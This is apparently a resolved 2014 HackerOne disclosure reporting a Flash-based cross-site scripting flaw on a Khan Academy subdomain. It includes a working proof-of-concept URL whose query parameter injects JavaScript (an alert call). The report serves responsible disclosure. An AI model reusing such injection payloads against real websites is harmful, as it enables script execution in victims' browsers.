XSS at http://smarthistory.khanacademy.org

Disclosed: 2014-04-09 04:33:45 By prakharprasad To khanacademy

Unknown

Vulnerability Details

Hi, There is a SWF-based XSS : http://smarthistory.khanacademy.org/assets/flash/cozimo.swf?iceID=\%22%29%29}catch%28e%29{alert%28%27XSS%27%29;}// Opening the link would trigger JavaScript execution! Works in possibly any browser with **Adobe Flash, i.e - Chrome, Firefox** Thanks!

Actions

View on HackerOne

Report Stats

Report ID: 6575
State: Closed
Substate: resolved
Upvotes: 6

XSS at http://smarthistory.khanacademy.org

Vulnerability Details

Actions

Report Stats

Share this report